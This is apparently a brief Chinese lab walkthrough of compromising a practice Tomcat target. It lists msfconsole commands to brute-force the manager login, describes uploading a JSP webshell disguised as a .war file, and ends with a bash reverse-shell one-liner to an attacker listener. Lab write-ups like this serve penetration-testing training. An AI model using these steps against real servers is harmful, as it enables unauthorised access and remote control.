信息收集
将靶机改为net模式,开启kali进行扫描,得到靶机ip
对靶机的端口,目录进行扫描,8080端口是 apache tomcat代理
进入8080端口,点击app出现登录窗口,弱口令没试出来,可以爆破登录窗口
查了一下,都是msf爆破【Web安全】kali渗透工具MSF以及msfconsole命令详解_kali msfconsole-CSDN博客
msfconsole
search tomcat login
use 0
show options
set STOP_ON_SUCCESS true
set RHOSTS (靶场ip)
run
登录上去后,可以找到部署war文件的位置,可以发现可以上传文件
我们将自己的jsp木马文件压缩成zip文件,然后把后缀改成war
访问木马文件,用哥斯拉连接
那么我们进行反弹shell,在kali开启监听,在虚拟终端输入命令进行反弹shell到kali上
bash -c 'bash -i>& /dev/tcp/192.168.247.131/8888 0>&1'
监听成功